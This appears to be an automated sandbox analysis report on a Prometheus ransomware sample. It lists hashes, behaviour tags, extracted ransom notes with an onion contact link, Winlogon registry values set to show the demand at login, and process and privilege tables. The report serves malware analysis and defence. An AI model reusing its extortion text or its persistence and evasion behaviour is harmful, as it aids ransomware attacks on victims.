prometheus | 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b

Analysis

max time kernel
133s
max time network
134s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Size

123KB
MD5

14de196b28bc12b5e571ea8303668041
SHA1

7f400d518bd716e75c795de47e1dc67f9d29d582
SHA256

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b
SHA512

1fe6f312057ca6debe2552f02c231cacff60f79fc40c053c26500f58fe4575fd4c820883bb4203ead2e9db00402883389d72853f304d3e198a333ef49e387b6f

Score

10^/10

prometheus discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: k4Udbe6Wqv16JnkEhIv7y3mg9sjE6+8CMT3e/UZRkNFfhrQX+OGj0F10EkWWT3fSxUp52L/A4xXwPoMXw8IqsjKseXodt0v8LvP7NivEr3lQ3HKHdkh1E6EXC79aqUbj4xjGKov2CFOmiA0dtWKrdiGKKFM9dbkG8m/k1C7TxWLmxmxlqt8diqz6fZ89oRSKp1OcWddWxDyaPgomBgZNvWVyEq61MocI6EQk6+m1u5YifGxxrAUAT5ZnGrSd7VUEqENhSt5JZ9tCCjHqKpC+8Z93w6ZcdwGi7Ew5t8YVR6e7K8MESL8xUeMCGX+OyM4bqR43gIqlh67dN5f3FzLuaKlOh/po2LMV468Mxi0apAn7OyAcKpvOK6erqstxbGXmXhI9NFWHFwk6KjPpmP+dnuPPEZfeLYz7QrqjaGx/8WCcGRjNgZ3KOzsVrrLFduSYtBrv/UWV6FKEwXbLz7cxrL/zTrDsDyEXj7Tolbpfo9Wanm5DmE3IN8Klv5sOl5Irn3VTA1wRBF+8xyQCM6NZbkYUzKJ7pIjgG6mca188d/7hP+VQOwf0fXggwO2Rr1kffVXWEJZ5hn+31czcj1Nq6lcuLHvqgoHYEXNL7Chbum7W+aqsWT29knUSLZ4N1PUazZ7lQUkP1IwrDLdVOcALPxGLDdLwZ0Xo7FIOGdbr7es=

URLs

http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: k4Udbe6Wqv16JnkEhIv7y3mg9sjE6+8CMT3e/UZRkNFfhrQX+OGj0F10EkWWT3fSxUp52L/A4xXwPoMXw8IqsjKseXodt0v8LvP7NivEr3lQ3HKHdkh1E6EXC79aqUbj4xjGKov2CFOmiA0dtWKrdiGKKFM9dbkG8m/k1C7TxWLmxmxlqt8diqz6fZ89oRSKp1OcWddWxDyaPgomBgZNvWVyEq61MocI6EQk6+m1u5YifGxxrAUAT5ZnGrSd7VUEqENhSt5JZ9tCCjHqKpC+8Z93w6ZcdwGi7Ew5t8YVR6e7K8MESL8xUeMCGX+OyM4bqR43gIqlh67dN5f3FzLuaKlOh/po2LMV468Mxi0apAn7OyAcKpvOK6erqstxbGXmXhI9NFWHFwk6KjPpmP+dnuPPEZfeLYz7QrqjaGx/8WCcGRjNgZ3KOzsVrrLFduSYtBrv/UWV6FKEwXbLz7cxrL/zTrDsDyEXj7Tolbpfo9Wanm5DmE3IN8Klv5sOl5Irn3VTA1wRBF+8xyQCM6NZbkYUzKJ7pIjgG6mca188d/7hP+VQOwf0fXggwO2Rr1kffVXWEJZ5hn+31czcj1Nq6lcuLHvqgoHYEXNL7Chbum7W+aqsWT29knUSLZ4N1PUazZ7lQUkP1IwrDLdVOcALPxGLDdLwZ0Xo7FIOGdbr7es=

URLs

http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD

Signatures

Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid	Process
4968	icacls.exe
4656	icacls.exe
4996	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4480	taskkill.exe
4584	taskkill.exe
4636	taskkill.exe
5052	taskkill.exe
3948	taskkill.exe
2120	taskkill.exe
4104	taskkill.exe
4412	taskkill.exe
4188	taskkill.exe
3968	taskkill.exe
1324	taskkill.exe
4688	taskkill.exe
4780	taskkill.exe
3984	taskkill.exe
3388	taskkill.exe
428	taskkill.exe
3952	taskkill.exe
4988	taskkill.exe
4456	taskkill.exe
4792	taskkill.exe
3984	taskkill.exe
384	taskkill.exe
4212	taskkill.exe
4332	taskkill.exe
4276	taskkill.exe
4516	taskkill.exe
4612	taskkill.exe
3864	taskkill.exe
3848	taskkill.exe
4140	taskkill.exe
3856	taskkill.exe
4504	taskkill.exe
4824	taskkill.exe
4728	taskkill.exe
3960	taskkill.exe
4224	taskkill.exe
4268	taskkill.exe
4856	taskkill.exe
2136	taskkill.exe
3868	taskkill.exe
3400	taskkill.exe
4512	taskkill.exe
4740	taskkill.exe
5064	taskkill.exe
1296	taskkill.exe
1012	taskkill.exe
3116	taskkill.exe
752	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1096	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
4348	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

pid	Process
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	3960	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	3388	taskkill.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	3952	taskkill.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	384	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	3400	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	4140	taskkill.exe
Token: SeDebugPrivilege	4212	Conhost.exe
Token: SeDebugPrivilege	4224	Conhost.exe
Token: SeDebugPrivilege	4332	taskkill.exe
Token: SeDebugPrivilege	4412	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	4512	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	4988	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	5064	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	1296	taskkill.exe
Token: SeDebugPrivilege	4188	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	3856	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeDebugPrivilege	4504	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	4612	taskkill.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	4728	taskkill.exe
Token: SeDebugPrivilege	4640	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

pid	Process
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

pid	Process
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	pid	Process	procid_target
PID 1808 wrote to memory of 3984	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	79
PID 1808 wrote to memory of 3984	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	79
PID 1808 wrote to memory of 3984	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	79
PID 1808 wrote to memory of 8	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	81
PID 1808 wrote to memory of 8	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	81
PID 1808 wrote to memory of 8	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	81
PID 1808 wrote to memory of 1096	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	83
PID 1808 wrote to memory of 1096	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	83
PID 1808 wrote to memory of 1096	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	83
PID 1808 wrote to memory of 2132	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	85
PID 1808 wrote to memory of 2132	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	85
PID 1808 wrote to memory of 2132	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	85
PID 1808 wrote to memory of 3488	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	87
PID 1808 wrote to memory of 3488	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	87
PID 1808 wrote to memory of 3488	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	87
PID 1808 wrote to memory of 584	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	89
PID 1808 wrote to memory of 584	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	89
PID 1808 wrote to memory of 584	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	89
PID 1808 wrote to memory of 3284	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	91
PID 1808 wrote to memory of 3284	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	91
PID 1808 wrote to memory of 3284	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	91
PID 1808 wrote to memory of 2780	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	93
PID 1808 wrote to memory of 2780	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	93
PID 1808 wrote to memory of 2780	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	93
PID 1808 wrote to memory of 2760	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	94
PID 1808 wrote to memory of 2760	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	94
PID 1808 wrote to memory of 2760	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	94
PID 1808 wrote to memory of 3968	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	97
PID 1808 wrote to memory of 3968	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	97
PID 1808 wrote to memory of 3968	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	97
PID 1808 wrote to memory of 3772	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	99
PID 1808 wrote to memory of 3772	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	99
PID 1808 wrote to memory of 3772	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	99
PID 1808 wrote to memory of 3856	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	101
PID 1808 wrote to memory of 3856	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	101
PID 1808 wrote to memory of 3856	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	101
PID 1808 wrote to memory of 2104	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	106
PID 1808 wrote to memory of 2104	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	106
PID 1808 wrote to memory of 2104	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	106
PID 1808 wrote to memory of 364	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	102
PID 1808 wrote to memory of 364	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	102
PID 1808 wrote to memory of 364	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	102
PID 1808 wrote to memory of 1012	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	107
PID 1808 wrote to memory of 1012	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	107
PID 1808 wrote to memory of 1012	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	107
PID 1808 wrote to memory of 3864	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	108
PID 1808 wrote to memory of 3864	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	108
PID 1808 wrote to memory of 3864	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	108
PID 1808 wrote to memory of 3960	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	110
PID 1808 wrote to memory of 3960	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	110
PID 1808 wrote to memory of 3960	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	110
PID 1808 wrote to memory of 3328	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	113
PID 1808 wrote to memory of 3328	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	113
